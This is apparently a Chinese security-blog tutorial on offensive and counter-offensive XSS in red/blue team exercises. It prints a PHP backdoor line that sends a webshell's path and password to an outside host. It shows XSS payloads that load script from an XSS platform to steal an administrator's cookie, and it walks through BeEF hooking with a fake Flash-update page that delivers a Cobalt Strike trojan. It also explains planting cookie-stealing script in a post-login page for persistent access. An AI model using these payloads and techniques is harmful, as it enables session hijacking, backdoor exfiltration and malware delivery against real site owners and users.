您的足迹:首页 > 技术实战 >web 安全 XSS 红队盲打&蓝队钓鱼反击权限维持

web 安全 XSS 红队盲打&蓝队钓鱼反击权限维持


一、关于红蓝队环境安装

linux一款红/蓝队环境自动化部署工具

下载地址:

此处内容已隐藏,注册会员评论即可查看

bash f8x -h  查看使用参数

二、红队盲打目标webshell箱子反击

webshell 箱子:用来收集别人入侵控制的 webshell 的信息(后门地址及密码)作者:为了保证得到更多别人的成功东西,那么他会在论坛 QQ 群等地方发布类似的后门文件并且配上特有宣传词汇诱惑你下载使用,简单的说一般这些后门文件的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的 shell 发送到他的服务器,就相当于你给别人打工。

各种webshell:

下载地址:

此处内容已隐藏,注册会员评论即可查看

webshell箱子搭建好如下

然后在本地搭建一个php服务,放一个php大马

并且在大马里面添加一个不为人知的代码

$admin[pass]='ec38fe2a8497e0a8d6d349b3533038cb'; //angel

$url=$_SERVER['SCRIPT_FILENAME'];

echo $url;

echo "<script src='http://192.168.111.128:80/api.asp?url=$url&pass=$admin[pass]'></script>";

 

完事之后访问就能看到webshell箱子上线

反制webshell箱子
那我们可以数据包之间的请求来判断是否有后门

http://192.168.111.128/api.asp?url=D:/phpstudy_pro/WWW/as.php&pass=ec38fe2a8497e0a8d6d349b3533038cb

里相当于是一个发送自己shell信息的地址,这里有变量的传递并且还可能存在展示的信息,展示的内容受到我们的控制,那么将展示信息修改成盗取cookie的js代码实现反杀

1、http://192.168.111.128/api.asp?
2、url=<sCRiPt sRC=//xss.pt/82MJ></sCrIpT>&id=1&
3、pass=<sCRiPt sRC=//xss.pt/82MJ></sCrIpT>

这里模仿管理员正常浏览,于是就中招

可以看到我们用xss平台的恶意语句成功利用,已经上线

获取到cookie,我们就可以利用cookie进行登陆

抓包修改cookie,成功进入后台

三、蓝队搞笑钓鱼反杀

Flash钓鱼弹窗版:

此处内容已隐藏,注册会员评论即可查看

Beef-XSS安装平台:
此处内容已隐藏,注册会员评论即可查看

  1. 伪造好Flash钓鱼网址

    2.然后在主页访问就自动加载一下beef的xss

  1. 3.现在就开始模仿一个误入歧途的红队人员,现在开始进入一个资源池的网址进行信息收集

这时候beef的xss恶意代码就已经自动加载上线

然后让他强行跳转到钓鱼页面

此时如果被攻击者点击立即升级,下载我们的CS木马并运行

CS上线之后,蓝队人员就可以写报告咯

四、红队利用Xss+Cookie权限维持

在红蓝对抗里面 ,红队经常要控制权限,其中web权限大部分都采用的shell控制, 但是shell会出现被删除,被拦截,被查杀等情况,漏洞也有可能被找到修复到,下一次控制的机会就基本没有了,那么权限维持将盗取cookie的js代码植入到后台登录成功的文件中去,实现每个登录成功的操作都会将其cookie发送到平台,这样实现了长期的控制,并且这个代码不会被查杀,拦截等情况

把xss平台上的代码放在登陆成功后的页面,这样就能实现权限维持

登陆成功后,xss代码成功利用,缺陷就是加载的过程会有点慢

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(1)

看看
路人甲 2周前(07-16) 回复